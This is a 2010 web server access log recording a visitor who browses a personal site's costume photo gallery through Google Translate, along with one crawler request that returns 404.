201.64.135.84 - - [20/May/2010:06:39:28 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.0" 200 155727 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/cd-page1.htm&rurl=translate.google.com.br&usg=ALkJrhieC5868wXe7TplDIO6om5Yay2MZw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:39:50 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:39:51 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.0" 200 46929 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:51 -0500] "GET /costume/027_JPG%20copy.jpg HTTP/1.0" 200 46009 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:51 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.0" 200 48186 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:53 -0500] "GET /costume/029_JPG%20copy.jpg HTTP/1.0" 200 47959 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:53 -0500] "GET /costume/028_JPG%20copy.jpg HTTP/1.0" 200 51488 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:53 -0500] "GET /costume/030_JPG%20copy.jpg HTTP/1.0" 200 45745 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:53 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.0" 200 44271 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
87.250.255.243 - - [20/May/2010:06:39:54 -0500] "GET /logs/access_log.1252972800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
201.64.135.84 - - [20/May/2010:06:39:54 -0500] "GET /costume/032_JPG%20copy.jpg HTTP/1.0" 200 46966 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:54 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.0" 200 46394 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:55 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.0" 200 43973 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:55 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.0" 200 44291 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:56 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.0" 200 55068 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb3.htm&rurl=translate.google.com.br&usg=ALkJrhjueGuzOxA9---N-QvpVW87Wq-MPA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:40:15 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:40:16 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.0" 200 46731 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:16 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.0" 200 46480 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:16 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.0" 200 46400 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:16 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.0" 200 49303 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:18 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.0" 200 43788 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:18 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.0" 200 45534 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:18 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.0" 200 47808 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:18 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.0" 200 46286 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:19 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.0" 200 46590 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:19 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.0" 200 46201 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:19 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.0" 200 50534 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb4.htm&rurl=translate.google.com.br&usg=ALkJrhgLHnDJuj5J5Kl_D4fdII5BCu13pA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:40:53 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:40:54 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.0" 200 41544 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:54 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.0" 200 45569 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:55 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.0" 200 46261 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:55 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.0" 200 46644 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:56 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.0" 200 47421 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:56 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.0" 200 42090 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:56 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.0" 200 45237 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:56 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.0" 200 47426 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:57 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.0" 200 45023 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:57 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.0" 200 47636 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:58 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.0" 200 43881 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:40:58 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.0" 200 44423 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb5.htm&rurl=translate.google.com.br&usg=ALkJrhgdILQZJk9XVHDNXQSoyXCFTswGfw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:41:31 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:41:31 -0500] "GET /costume/costume62%20copy.JPG HTTP/1.0" 200 16357 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:31 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.0" 200 18054 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:31 -0500] "GET /costume/costume64%20copy.JPG HTTP/1.0" 200 16453 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:31 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.0" 200 17743 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:32 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.0" 200 17118 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:32 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.0" 200 18435 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:33 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.0" 200 17016 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:33 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.0" 200 17278 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:33 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.0" 200 16551 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:33 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.0" 200 15824 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:34 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.0" 200 17645 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:34 -0500] "GET /costume/costume70.JPG HTTP/1.0" 200 60587 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb6.htm&rurl=translate.google.com.br&usg=ALkJrhjF0_qn1CP3AYwVdA6kYNp-2zuS1Q""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:41:48 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:41:48 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.0" 200 17492 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:48 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.0" 200 17534 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:48 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.0" 200 16029 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:48 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.0" 200 16386 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:49 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.0" 200 17209 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:49 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.0" 200 18119 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:49 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.0" 200 15860 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:49 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.0" 200 19168 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:50 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.0" 200 16328 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:50 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.0" 200 15963 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:50 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.0" 200 15105 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:41:50 -0500] "GET /costume/costume80.JPG HTTP/1.0" 200 67426 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb7.htm&rurl=translate.google.com.br&usg=ALkJrhhXMrzHF3e5aqJ5StiMNT7AGJYjxQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
